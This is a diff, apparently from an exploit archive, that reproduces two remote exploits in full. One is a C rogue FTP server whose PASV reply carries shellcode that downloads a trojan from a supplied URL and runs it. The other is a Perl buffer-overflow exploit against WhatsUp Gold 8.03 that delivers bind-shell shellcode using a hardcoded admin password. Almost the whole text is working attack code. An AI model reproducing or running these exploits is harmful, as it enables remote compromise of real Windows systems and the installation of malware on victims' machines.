-"\xAB\x7C\xFF\xFF\xFF\x03\x80\xAB\x7D\xFF\xFF\xFF\x03\x80\xAB\x7E\xFF\xFF\xFF\x03"
-"\x80\xAB\x7F\xFF\xFF\xFF\x03\x80\x6B\x80\x03\x80\x6B\x81\x03\x80\x6B\x82\x03\x90"
-"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xE9\x61\xF9\xFF\xFF";
+\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
+\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
+\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
+\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
+\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\xEB\\x30\\x5F\\xFC\\x8B\\xF7\\x80\"
+\"\\x3F\\x08\\x75\\x03\\x80\\x37\\x08\\x47\\x80\\x3F\\x01\\x75\\xF2\\x8B\\xE6\\x33\\xD2\\xB2\\x04\\xC1\"
+\"\\xE2\\x08\\x2B\\xE2\\x8B\\xEC\\x33\\xD2\\xB2\\x03\\xC1\\xE2\\x08\\x2B\\xE2\\x54\\x5A\\xB2\\x7C\\x8B\"
+\"\\xE2\\xEB\\x02\\xEB\\x57\\x89\\x75\\xFC\\x33\\xC0\\xB4\\x40\\xC1\\xE0\\x08\\x89\\x45\\xF8\\x8B\\x40\"
+\"\\x3C\\x03\\x45\\xF8\\x8D\\x40\\x7E\\x8B\\x40\\x02\\x03\\x45\\xF8\\x8B\\xF8\\x8B\\x7F\\x0C\\x03\\x7D\"
+\"\\xF8\\x81\\x3F\\x4B\\x45\\x52\\x4E\\x74\\x07\\x83\\xC0\\x14\\x8B\\xF8\\xEB\\xEB\\x50\\x8B\\xF8\\x33\"
+\"\\xC9\\x33\\xC0\\xB1\\x10\\x8B\\x17\\x03\\x55\\xF8\\x52\\xEB\\x03\\x57\\x8B\\xD7\\x80\\x7A\\x03\\x80\"
+\"\\x74\\x16\\x8B\\x32\\x03\\x75\\xF8\\x83\\xC6\\x02\\xEB\\x02\\xEB\\x7E\\x8B\\x7D\\xFC\\x51\\xF3\\xA6\"
+\"\\x59\\x5F\\x74\\x06\\x40\\x83\\xC7\\x04\\xEB\\xDB\\x5F\\x8B\\x7F\\x10\\x03\\x7D\\xF8\\xC1\\xE0\\x02\"
+\"\\x03\\xF8\\x8B\\x07\\x8B\\x5D\\xFC\\x8D\\x5B\\x11\\x53\\xFF\\xD0\\x89\\x45\\xF4\\x8B\\x40\\x3C\\x03\"
+\"\\x45\\xF4\\x8B\\x70\\x78\\x03\\x75\\xF4\\x8D\\x76\\x1C\\xAD\\x03\\x45\\xF4\\x89\\x45\\xF0\\xAD\\x03\"
+\"\\x45\\xF4\\x89\\x45\\xEC\\xAD\\x03\\x45\\xF4\\x89\\x45\\xE8\\x8B\\x55\\xEC\\x8B\\x75\\xFC\\x8D\\x76\"
+\"\\x1E\\x33\\xDB\\x33\\xC9\\xB1\\x0F\\x8B\\x3A\\x03\\x7D\\xF4\\x56\\x51\\xF3\\xA6\\x59\\x5E\\x74\\x06\"
+\"\\x43\\x8D\\x52\\x04\\xEB\\xED\\xD1\\xE3\\x8B\\x75\\xE8\\x03\\xF3\\x33\\xC9\\x66\\x8B\\x0E\\xEB\\x02\"
+\"\\xEB\\x7D\\xC1\\xE1\\x02\\x03\\x4D\\xF0\\x8B\\x09\\x03\\x4D\\xF4\\x89\\x4D\\xE4\\x8B\\x5D\\xFC\\x8D\"
+\"\\x5B\\x2D\\x33\\xC9\\xB1\\x07\\x8D\\x7D\\xE0\\x53\\x51\\x53\\x8B\\x55\\xF4\\x52\\x8B\\x45\\xE4\\xFC\"
+\"\\xFF\\xD0\\x59\\x5B\\xFD\\xAB\\x8D\\x64\\x24\\xF8\\x38\\x2B\\x74\\x03\\x43\\xEB\\xF9\\x43\\xE2\\xE1\"
+\"\\x8B\\x45\\xE0\\x53\\xFC\\xFF\\xD0\\xFD\\xAB\\x33\\xC9\\xB1\\x04\\x8D\\x5B\\x0C\\xFC\\x53\\x51\\x53\"
+\"\\x8B\\x55\\xC4\\x52\\x8B\\x45\\xE4\\xFF\\xD0\\x59\\x5B\\xFD\\xAB\\x38\\x2B\\x74\\x03\\x43\\xEB\\xF9\"
+\"\\x43\\xE2\\xE5\\xFC\\x33\\xD2\\xB6\\x1F\\xC1\\xE2\\x08\\x52\\x33\\xD2\\x52\\x8B\\x45\\xD4\\xFF\\xD0\"
+\"\\x89\\x45\\xB0\\x33\\xD2\\xEB\\x02\\xEB\\x77\\x52\\x52\\x52\\x52\\x53\\x8B\\x45\\xC0\\xFF\\xD0\\x8D\"
+\"\\x5B\\x03\\x89\\x45\\xAC\\x33\\xD2\\x52\\xB6\\x80\\xC1\\xE2\\x10\\x52\\x33\\xD2\\x52\\x52\\x8D\\x7B\"
+\"\\x09\\x57\\x50\\x8B\\x45\\xBC\\xFF\\xD0\\x89\\x45\\xA8\\x8D\\x55\\xA0\\x52\\x33\\xD2\\xB6\\x1F\\xC1\"
+\"\\xE2\\x08\\x52\\x8B\\x4D\\xB0\\x51\\x50\\x8B\\x45\\xB8\\xFF\\xD0\\x8B\\x4D\\xA8\\x51\\x8B\\x45\\xB4\"
+\"\\xFF\\xD0\\x8B\\x4D\\xAC\\x51\\x8B\\x45\\xB4\\xFF\\xD0\\x33\\xD2\\x52\\x53\\x8B\\x45\\xDC\\xFF\\xD0\"
+\"\\x89\\x45\\xA4\\x8B\\x7D\\xA0\\x57\\x8B\\x55\\xB0\\x52\\x50\\x8B\\x45\\xD8\\xFF\\xD0\\x8B\\x55\\xA4\"
+\"\\x52\\x8B\\x45\\xD0\\xFF\\xD0\\xEB\\x02\\xEB\\x12\\x33\\xD2\\x90\\x52\\x53\\x8B\\x45\\xCC\\xFF\\xD0\"
+\"\\x33\\xD2\\x52\\x8B\\x45\\xC8\\xFF\\xD0\\xE8\\xE6\\xFD\\xFF\\xFF\\x47\\x65\\x74\\x4D\\x6F\\x64\\x75\"
+\"\\x6C\\x65\\x48\\x61\\x6E\\x64\\x6C\\x65\\x41\\x08\\x6B\\x65\\x72\\x6E\\x65\\x6C\\x33\\x32\\x2d\\x64\"
+\"\\x6C\\x6C\\x08\\x47\\x65\\x74\\x50\\x72\\x6F\\x63\\x41\\x64\\x64\\x72\\x65\\x73\\x73\\x08\\x4C\\x6F\"
+\"\\x61\\x64\\x4C\\x69\\x62\\x72\\x61\\x72\\x79\\x41\\x08\\x5F\\x6C\\x63\\x72\\x65\\x61\\x74\\x08\\x5F\"
+\"\\x6C\\x77\\x72\\x69\\x74\\x65\\x08\\x47\\x6C\\x6F\\x62\\x61\\x6C\\x41\\x6C\\x6C\\x6F\\x63\\x08\\x5F\"
+\"\\x6C\\x63\\x6C\\x6F\\x73\\x65\\x08\\x57\\x69\\x6E\\x45\\x78\\x65\\x63\\x08\\x45\\x78\\x69\\x74\\x50\"
+\"\\x72\\x6F\\x63\\x65\\x73\\x73\\x08\\x77\\x69\\x6E\\x69\\x6E\\x65\\x74\\x2d\\x64\\x6C\\x6C\\x08\\x49\"
+\"\\x6E\\x74\\x65\\x72\\x6E\\x65\\x74\\x4F\\x70\\x65\\x6E\\x41\\x08\\x49\\x6E\\x74\\x65\\x72\\x6E\\x65\"
+\"\\x74\\x4F\\x70\\x65\\x6E\\x55\\x72\\x6C\\x41\\x08\\x49\\x6E\\x74\\x65\\x72\\x6E\\x65\\x74\\x52\\x65\"
+\"\\x61\\x64\\x46\\x69\\x6C\\x65\\x08\\x49\\x6E\\x74\\x65\\x72\\x6E\\x65\\x74\\x43\\x6C\\x6F\\x73\\x65\"
+\"\\x48\\x61\\x6E\\x64\\x6C\\x65\\x08\\x4E\\x53\\x08\\x6E\\x73\\x73\\x63\\x2d\\x65\\x78\\x65\\x08\\x68\"
+\"\\x74\\x74\\x70\\x3A\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\"
+\"\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\"
+\"\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\"
+\"\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\"
+\"\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
+\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
+\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
+\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
+\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
+\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
+\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x25\\x49\\xE1\"
+\"\\x77\\x90\\x90\\x90\\x90\\xFE\\x83\\x75\\xFE\\xFF\\xFF\\xFE\\x83\\xD5\\xFE\\xFF\\xFF\\xFE\\x83\\x25\"
+\"\\xFF\\xFF\\xFF\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
+\"\\x80\\xAB\\x2F\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x30\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x31\\xFF\\xFF\\xFF\"
+\"\\x03\\x80\\xAB\\x32\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x33\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x34\\xFF\\xFF\"
+\"\\xFF\\x03\\x80\\xAB\\x35\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x36\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x37\\xFF\"
+\"\\xFF\\xFF\\x03\\x80\\xAB\\x38\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x39\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x3A\"
+\"\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x3B\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x3C\\xFF\\xFF\\xFF\\x03\\x80\\xAB\"
+\"\\x3D\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x3E\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x3F\\xFF\\xFF\\xFF\\x03\\x80\"
+\"\\xAB\\x40\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x41\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x42\\xFF\\xFF\\xFF\\x03\"
+\"\\x80\\xAB\\x43\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x44\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x45\\xFF\\xFF\\xFF\"
+\"\\x03\\x80\\xAB\\x46\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x47\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x48\\xFF\\xFF\"
+\"\\xFF\\x03\\x80\\xAB\\x49\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x4A\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x4B\\xFF\"
+\"\\xFF\\xFF\\x03\\x80\\xAB\\x4C\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x4D\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x4E\"
+\"\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x4F\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x50\\xFF\\xFF\\xFF\\x03\\x80\\xAB\"
+\"\\x51\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x52\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x53\\xFF\\xFF\\xFF\\x03\\x80\"
+\"\\xAB\\x54\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x55\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x56\\xFF\\xFF\\xFF\\x03\"
+\"\\x80\\xAB\\x57\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x58\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x59\\xFF\\xFF\\xFF\"
+\"\\x03\\x80\\xAB\\x5A\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x5B\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x5C\\xFF\\xFF\"
+\"\\xFF\\x03\\x80\\xAB\\x5D\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x5E\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x5F\\xFF\"
+\"\\xFF\\xFF\\x03\\x80\\xAB\\x60\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x61\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x62\"
+\"\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x63\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x64\\xFF\\xFF\\xFF\\x03\\x80\\xAB\"
+\"\\x65\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x66\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x67\\xFF\\xFF\\xFF\\x03\\x80\"
+\"\\xAB\\x68\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x69\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x6A\\xFF\\xFF\\xFF\\x03\"
+\"\\x80\\xAB\\x6B\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x6C\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x6D\\xFF\\xFF\\xFF\"
+\"\\x03\\x80\\xAB\\x6E\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x6F\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x70\\xFF\\xFF\"
+\"\\xFF\\x03\\x80\\xAB\\x71\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x72\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x73\\xFF\"
+\"\\xFF\\xFF\\x03\\x80\\xAB\\x74\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x75\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x76\"
+\"\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x77\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x78\\xFF\\xFF\\xFF\\x03\\x80\\xAB\"
+\"\\x79\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x7A\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x7B\\xFF\\xFF\\xFF\\x03\\x80\"
+\"\\xAB\\x7C\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x7D\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x7E\\xFF\\xFF\\xFF\\x03\"
+\"\\x80\\xAB\\x7F\\xFF\\xFF\\xFF\\x03\\x80\\x6B\\x80\\x03\\x80\\x6B\\x81\\x03\\x80\\x6B\\x82\\x03\\x90\"
+\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\xE9\\x61\\xF9\\xFF\\xFF\";
 
 char *url = argv[2];
 
 if(strlen(url)>80){
-printf("ERROR: trojan url is too long!\n");
+printf(\"ERROR: trojan url is too long!\\n\");
 return;
 }
 
@@ -140,8 +140,8 @@ url[i]+=3;
 exploit[839+i] = url[i];
 }
 
-exploit[839+i] = '\x0B';
-exploit[839+i+1] = '\x04';
+exploit[839+i] = \'\\x0B\';
+exploit[839+i+1] = \'\\x04\';
 
 WSADATA wsaData;
 WSAStartup(MAKEWORD(2,2), &wsaData);
@@ -153,52 +153,52 @@ addr_Sock.sin_family = AF_INET;
 addr_Sock.sin_addr.s_addr = htonl(INADDR_ANY);
 addr_Sock.sin_port = htons(atoi(argv[1]));
 
-printf("Awaiting for connections...\n");
+printf(\"Awaiting for connections...\\n\");
 
 if(bind(listen_Sock,(LPSOCKADDR)&addr_Sock, sizeof(struct sockaddr))) return;
 if(listen(listen_Sock, 1))return;
 SOCKET victim = accept(listen_Sock,NULL,NULL);
-printf("Victim connected...\n");
+printf(\"Victim connected...\\n\");
 
 char buffer[2048];
-sprintf(buffer, "220 drG4njubas roxx da world...\r\n");
+sprintf(buffer, \"220 drG4njubas roxx da world...\\r\\n\");
 send(victim, buffer, strlen(buffer), NULL);
 
 while(true){
 if(recv(victim, buffer, 2048, NULL)==SOCKET_ERROR)return;
-if(strncmp(buffer, "USER", 4)==0){
-sprintf(buffer, "%s\r\n", "331 Password required for user.");
+if(strncmp(buffer, \"USER\", 4)==0){
+sprintf(buffer, \"%s\\r\\n\", \"331 Password required for user.\");
 send(victim, buffer, strlen(buffer), NULL);
 }
-else if(strncmp(buffer, "PASS", 4)==0){
-sprintf(buffer, "%s\r\n", "230 User logged in.");
+else if(strncmp(buffer, \"PASS\", 4)==0){
+sprintf(buffer, \"%s\\r\\n\", \"230 User logged in.\");
 send(victim, buffer, strlen(buffer), NULL);
 }
-else if(strncmp(buffer, "SYST", 4)==0){
-sprintf(buffer, "%s\r\n", "215 Windows_NT version 5.0");
+else if(strncmp(buffer, \"SYST\", 4)==0){
+sprintf(buffer, \"%s\\r\\n\", \"215 Windows_NT version 5.0\");
 send(victim, buffer, strlen(buffer), NULL);
 }
-else if(strncmp(buffer, "REST", 4)==0){
-sprintf(buffer, "%s\r\n", "350 Restarting at blah.");
+else if(strncmp(buffer, \"REST\", 4)==0){
+sprintf(buffer, \"%s\\r\\n\", \"350 Restarting at blah.\");
 send(victim, buffer, strlen(buffer), NULL);
 }
-else if(strncmp(buffer, "PWD", 3)==0){
-sprintf(buffer, "%s\r\n", "257 Current directory was changed.");
+else if(strncmp(buffer, \"PWD\", 3)==0){
+sprintf(buffer, \"%s\\r\\n\", \"257 Current directory was changed.\");
 send(victim, buffer, strlen(buffer), NULL);
 }
-else if(strncmp(buffer, "TYPE", 4)==0){
-sprintf(buffer, "%s\r\n", "200 Type set to blah.");
+else if(strncmp(buffer, \"TYPE\", 4)==0){
+sprintf(buffer, \"%s\\r\\n\", \"200 Type set to blah.\");
 send(victim, buffer, strlen(buffer), NULL);
 }
-else if(strncmp(buffer, "PASV", 4)==0){
-printf("PASV command received, sending exploit...");
-sprintf(buffer, "227 (%s,1,1,1,1,1)\r\n", exploit);
+else if(strncmp(buffer, \"PASV\", 4)==0){
+printf(\"PASV command received, sending exploit...\");
+sprintf(buffer, \"227 (%s,1,1,1,1,1)\\r\\n\", exploit);
 send(victim, buffer, strlen(buffer), NULL);
-printf("finnished.\n");
+printf(\"finnished.\\n\");
 break;
 }
 else{
-printf("ERROR: Wrong client or pasv mode is not enabled.\n");
+printf(\"ERROR: Wrong client or pasv mode is not enabled.\\n\");
 break;
 }
 
diff --git a/platforms/windows/remote/566.pl b/platforms/windows/remote/566.pl
index fe3ef86e8..1a20a384f 100755
--- a/platforms/windows/remote/566.pl
+++ b/platforms/windows/remote/566.pl
@@ -38,80 +38,80 @@ my $port = shift(@ARGV);
 
 # Bind shellcode port 28876 (HDM, metasploit.org)
 my $shellcode =
-"\xeb\x43\x56\x57\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x52\x8b\x52". 
-"\x20\x01\xea\x31\xc0\x31\xc9\x41\x8b\x34\x8a\x01\xee\x31\xff\xc1". 
-"\xcf\x13\xac\x01\xc7\x85\xc0\x75\xf6\x39\xdf\x75\xea\x5a\x8b\x5a". 
-"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01". 
-"\xe8\x5f\x5e\xff\xe0\xfc\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b". 
-"\x70\x1c\xad\x8b\x68\x08\x31\xc0\x66\xb8\x6c\x6c\x50\x68\x33\x32". 
-"\x2e\x64\x68\x77\x73\x32\x5f\x54\xbb\x71\xa7\xe8\xfe\xe8\x90\xff". 
-"\xff\xff\x89\xef\x89\xc5\x81\xc4\x70\xfe\xff\xff\x54\x31\xc0\xfe". 
-"\xc4\x40\x50\xbb\x22\x7d\xab\x7d\xe8\x75\xff\xff\xff\x31\xc0\x50". 
-"\x50\x50\x50\x40\x50\x40\x50\xbb\xa6\x55\x34\x79\xe8\x61\xff\xff". 
-"\xff\x89\xc6\x31\xc0\x50\x50\x35\x02\x01\x70\xcc\xfe\xcc\x50\x89". 
-"\xe0\x50\x6a\x10\x50\x56\xbb\x81\xb4\x2c\xbe\xe8\x42\xff\xff\xff". 
-"\x31\xc0\x50\x56\xbb\xd3\xfa\x58\x9b\xe8\x34\xff\xff\xff\x58\x6a". 
-"\x10\x54\x50\x56\xbb\x47\xf3\x56\xc6\xe8\x24\xff\xff\xff\x31\xdb". 
-"\x53\x68\x2e\x63\x6d\x64\x89\xe1\x41\x50\x50\x50\x53\x53\x31\xc0". 
-"\xfe\xc4\x40\x50\x53\x53\x53\x53\x53\x53\x53\x53\x53\x53\x6a\x44". 
-"\x89\xe6\x50\x55\x53\x53\x53\x53\x54\x56\x53\x53\x53\x43\x53\x4b". 
-"\x53\x53\x51\x53\x89\xfd\xbb\x21\xd0\x05\xd0\xe8\xe2\xfe\xff\xff". 
-"\x31\xc0\x48\x8b\x44\x24\x04\xbb\x43\xcb\x8d\x5f\xe8\xd1\xfe\xff". 
-"\xff\x5d\x5d\x5d\xbb\x12\x6b\x6d\xd0\xe8\xc4\xfe\xff\xff\x31\xc0". 
-"\x50\x89\xfd\xbb\x69\x1d\x42\x3a\xe8\xb5\xfe\xff\xff"; 
+\"\\xeb\\x43\\x56\\x57\\x8b\\x45\\x3c\\x8b\\x54\\x05\\x78\\x01\\xea\\x52\\x8b\\x52\". 
+\"\\x20\\x01\\xea\\x31\\xc0\\x31\\xc9\\x41\\x8b\\x34\\x8a\\x01\\xee\\x31\\xff\\xc1\". 
+\"\\xcf\\x13\\xac\\x01\\xc7\\x85\\xc0\\x75\\xf6\\x39\\xdf\\x75\\xea\\x5a\\x8b\\x5a\". 
+\"\\x24\\x01\\xeb\\x66\\x8b\\x0c\\x4b\\x8b\\x5a\\x1c\\x01\\xeb\\x8b\\x04\\x8b\\x01\". 
+\"\\xe8\\x5f\\x5e\\xff\\xe0\\xfc\\x31\\xc0\\x64\\x8b\\x40\\x30\\x8b\\x40\\x0c\\x8b\". 
+\"\\x70\\x1c\\xad\\x8b\\x68\\x08\\x31\\xc0\\x66\\xb8\\x6c\\x6c\\x50\\x68\\x33\\x32\". 
+\"\\x2e\\x64\\x68\\x77\\x73\\x32\\x5f\\x54\\xbb\\x71\\xa7\\xe8\\xfe\\xe8\\x90\\xff\". 
+\"\\xff\\xff\\x89\\xef\\x89\\xc5\\x81\\xc4\\x70\\xfe\\xff\\xff\\x54\\x31\\xc0\\xfe\". 
+\"\\xc4\\x40\\x50\\xbb\\x22\\x7d\\xab\\x7d\\xe8\\x75\\xff\\xff\\xff\\x31\\xc0\\x50\". 
+\"\\x50\\x50\\x50\\x40\\x50\\x40\\x50\\xbb\\xa6\\x55\\x34\\x79\\xe8\\x61\\xff\\xff\". 
+\"\\xff\\x89\\xc6\\x31\\xc0\\x50\\x50\\x35\\x02\\x01\\x70\\xcc\\xfe\\xcc\\x50\\x89\". 
+\"\\xe0\\x50\\x6a\\x10\\x50\\x56\\xbb\\x81\\xb4\\x2c\\xbe\\xe8\\x42\\xff\\xff\\xff\". 
+\"\\x31\\xc0\\x50\\x56\\xbb\\xd3\\xfa\\x58\\x9b\\xe8\\x34\\xff\\xff\\xff\\x58\\x6a\". 
+\"\\x10\\x54\\x50\\x56\\xbb\\x47\\xf3\\x56\\xc6\\xe8\\x24\\xff\\xff\\xff\\x31\\xdb\". 
+\"\\x53\\x68\\x2e\\x63\\x6d\\x64\\x89\\xe1\\x41\\x50\\x50\\x50\\x53\\x53\\x31\\xc0\". 
+\"\\xfe\\xc4\\x40\\x50\\x53\\x53\\x53\\x53\\x53\\x53\\x53\\x53\\x53\\x53\\x6a\\x44\". 
+\"\\x89\\xe6\\x50\\x55\\x53\\x53\\x53\\x53\\x54\\x56\\x53\\x53\\x53\\x43\\x53\\x4b\". 
+\"\\x53\\x53\\x51\\x53\\x89\\xfd\\xbb\\x21\\xd0\\x05\\xd0\\xe8\\xe2\\xfe\\xff\\xff\". 
+\"\\x31\\xc0\\x48\\x8b\\x44\\x24\\x04\\xbb\\x43\\xcb\\x8d\\x5f\\xe8\\xd1\\xfe\\xff\". 
+\"\\xff\\x5d\\x5d\\x5d\\xbb\\x12\\x6b\\x6d\\xd0\\xe8\\xc4\\xfe\\xff\\xff\\x31\\xc0\". 
+\"\\x50\\x89\\xfd\\xbb\\x69\\x1d\\x42\\x3a\\xe8\\xb5\\xfe\\xff\\xff\"; 
 
-my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host,
+my $socket = IO::Socket::INET->new(proto=>\'tcp\', PeerAddr=>$host,
 PeerPort=>$port); 
-$socket or die "Cannot connect to the host.\n"; 
+$socket or die \"Cannot connect to the host.\\n\"; 
 
 $socket->autoflush(1); 
 
-print $socket "POST /_maincfgret.cgi HTTP/1.0\r\n"; 
-print $socket "Accept: image/gif, image/x-xbitmap, image/jpeg,
+print $socket \"POST /_maincfgret.cgi HTTP/1.0\\r\\n\"; 
+print $socket \"Accept: image/gif, image/x-xbitmap, image/jpeg,
 image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel,
 application/msword, application/x-shockwave-flash,
-application/vnd.citrix.AdvGWClient-2_2, */*\r\n"; 
-print $socket "Referer:
-http://127.0.0.1/NotifyAction.asp?action=AddType&instance=Beeper&end=end\r\n"; 
-print $socket "Accept-Language: en-us\r\nContent-Type:
-application/x-www-form-urlencoded\r\nConnection: Keep-Alive\r\n";
-print $socket "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
-5.1; T312461; .NET CLR 1.1.4322)\r\n";
-print $socket "Host: 127.0.0.1\r\nContent-Length: ";
-my $cmd ="page=notify&origname=&action=return&type=Beeper&instancename=";
+application/vnd.citrix.AdvGWClient-2_2, */*\\r\\n\"; 
+print $socket \"Referer:
+http://127.0.0.1/NotifyAction.asp?action=AddType&instance=Beeper&end=end\\r\\n\"; 
+print $socket \"Accept-Language: en-us\\r\\nContent-Type:
+application/x-www-form-urlencoded\\r\\nConnection: Keep-Alive\\r\\n\";
+print $socket \"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
+5.1; T312461; .NET CLR 1.1.4322)\\r\\n\";
+print $socket \"Host: 127.0.0.1\\r\\nContent-Length: \";
+my $cmd =\"page=notify&origname=&action=return&type=Beeper&instancename=\";
 
 
 #[-------815-------------] [ret] [-------------4080---------]
 #[A.....811...A][jmp] [ret] [nops][shc][E.......E ]
 
-$cmd .= "A"x811; #815 -4 
-$cmd .= "\xeb\x06\x90\x90"; #jumper <eb + 06> <garbage> jmp to shellcode
+$cmd .= \"A\"x811; #815 -4 
+$cmd .= \"\\xeb\\x06\\x90\\x90\"; #jumper <eb + 06> <garbage> jmp to shellcode
 
 
-#$cmd .= "\xfe\x63\xa1\x71"; #winXP SP1 ws2help.dll
-$cmd .= "\xc4\x2a\x02\x75"; #win2k sp0-sp4 ws2help.dll
+#$cmd .= \"\\xfe\\x63\\xa1\\x71\"; #winXP SP1 ws2help.dll
+$cmd .= \"\\xc4\\x2a\\x02\\x75\"; #win2k sp0-sp4 ws2help.dll
 
-#$cmd .= "LOWNOISE"; #garbage :D 
-$cmd .= "\x90"x2080;
+#$cmd .= \"LOWNOISE\"; #garbage :D 
+$cmd .= \"\\x90\"x2080;
 $cmd .= $shellcode;
-$cmd .= "E"x(2000-length($shellcode)); #mas basura
+$cmd .= \"E\"x(2000-length($shellcode)); #mas basura
 
-$cmd .= "&beepernumber=&upcode=0*&downcode=9*&trapcode=6*&end=end";
-print $socket length($cmd)."\r\nPragma: no-cache\r\nAuthorization: Basic
-YWRtaW46YWRtaW4=\r\n\r\n";
-print $socket $cmd."\r\n";
+$cmd .= \"&beepernumber=&upcode=0*&downcode=9*&trapcode=6*&end=end\";
+print $socket length($cmd).\"\\r\\nPragma: no-cache\\r\\nAuthorization: Basic
+YWRtaW46YWRtaW4=\\r\\n\\r\\n\";
+print $socket $cmd.\"\\r\\n\";
 
 close($socket); 
 exit(0); 
 
 sub usage 
 { 
-print "\n[LoWNOISE] IPSWITCH WhatsUp Gold 8.03 Remote fr33 exploit\n";
-print "===================================================\n";
